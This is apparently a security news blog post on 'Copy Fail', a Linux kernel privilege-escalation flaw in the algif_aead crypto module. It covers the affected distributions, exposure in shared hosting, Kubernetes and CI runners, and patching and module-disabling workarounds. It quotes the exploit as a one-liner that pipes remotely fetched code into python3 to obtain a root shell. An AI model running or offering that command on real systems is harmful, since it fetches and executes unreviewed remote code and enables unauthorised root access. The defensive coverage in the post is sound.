Copy Fail: The Linux Kernel Vulnerability That Affects Every Distribution Since 2017

A new Linux kernel vulnerability dubbed "Copy Fail" (CVE-2026-31431) has dropped on Hacker News with 1,259 points — and it affects essentially every mainstream Linux distribution released between 2017 and the patch date.

If you run any shared Linux environment — Kubernetes clusters, CI/CD runners, shared hosting, shell-as-a-service platforms — you need to read this.

What Is Copy Fail?

Copy Fail is a local privilege escalation vulnerability in the Linux kernel's crypto API. Specifically, it lives in the algif_aead kernel module, which handles authenticated encryption with associated data (AEAD) in the kernel's in-kernel crypto implementation.

The vulnerability allows an unprivileged local user to become root on any system running an affected kernel, requiring only an unprivileged local account — no network access, no kernel debugging features, no pre-installed primitives.

The proof-of-concept is a one-liner:

curl https://copy.fail/exp | python3 && su

Running that on a vulnerable system drops you into a root shell immediately.

Why This Is Serious

This isn't a theoretical vulnerability. The attack surface includes:

Shared hosting environments — Any multi-tenant server where users share a kernel. A compromised account can own the entire box.

Kubernetes clusters — The page cache is shared across the host kernel. A pod with the right primitives can escape container boundaries and compromise the node — crossing tenant boundaries.

CI/CD runners — GitHub Actions self-hosted runners, GitLab runners, Jenkins agents — anything that executes untrusted PR code as a regular user, on a shared kernel. A malicious PR becomes root on the runner.

Shell-as-a-service platforms — Jump hosts, build servers, shared dev boxes.

The researchers who found it (from theori-io) describe it as a "page cache race condition" — the same exploit binary works unmodified across every Linux distribution because the vulnerable code path is shared.

What Distributions Are Affected?

The researchers directly verified:

• •Ubuntu
• •Debian
• •Alpine
• •Gentoo

Their statement: "Other distributions running affected kernels — Arch, Fedora, Rocky, Alma, Oracle, the embedded crowd — behave the same."

If your kernel was built between 2017 and the patch date, you're likely in scope.

How to Fix It

Update your kernel — Most major distributions are now shipping the fix. Update your distribution's kernel package to include the mainline commit that prevents page-cache pages from ending up in writable destination scatterlists.

Workaround: Disable the vulnerable module

# Add this to /etc/modprobe.d/disable-algif.conf
install algif_aead /bin/true

# Or remove the module
rmmod algif_aead 2>/dev/null || true

For untrusted workloads — Block AF_ALG socket creation via seccomp:

# Block AF_ALG in seccomp profiles for containers/VMs running untrusted code

The Broader Implication for AI Infrastructure

Here's what makes this particularly relevant for AI teams: AI coding agents and CI/CD pipelines are prime targets.

AI coding agents like OpenClaw, Cursor, and GitHub Copilot operate in environments that execute untrusted code. Build servers, test runners, and agent sandboxes are all shared-kernel environments. This vulnerability means a single compromised or malicious prompt in a shared AI coding environment could escalate to root on the underlying host.

For teams running self-hosted AI coding agents on shared infrastructure:

1. Patch immediately — especially your CI runners and build servers

2. Audit your kernel versions — if you're on Ubuntu 22.04 LTS or similar with a 5.15+ kernel from 2022 or earlier, you may be running an affected kernel

3. Isolate AI agent environments — run agents in properly sandboxed VMs, not just containers sharing a kernel

4. Consider read-only root filesystems — even if exploited, limited write access reduces damage

The PoC Is Already Public

The full proof-of-concept is published at copy.fail and on GitHub so defenders can verify their own systems and validate vendor patches. The researchers note this was found with "about an hour of scan time against the Linux kernel crypto subsystem" using an autonomous agent.

The disclosure was reported to the Linux kernel security team before publication, giving distributions time to prepare patches.

What the Community Is Saying

The HN thread (1,259 points and climbing) is filled with developers confirming they tested it and it works as described. Several commenters noted this is a good reminder that kernel security is still the hardest problem in systems programming — and that automated vulnerability discovery via AI agents is accelerating finding these bugs.

---

Stay ahead of critical vulnerabilities. Follow NeuralStackly for AI infrastructure security coverage.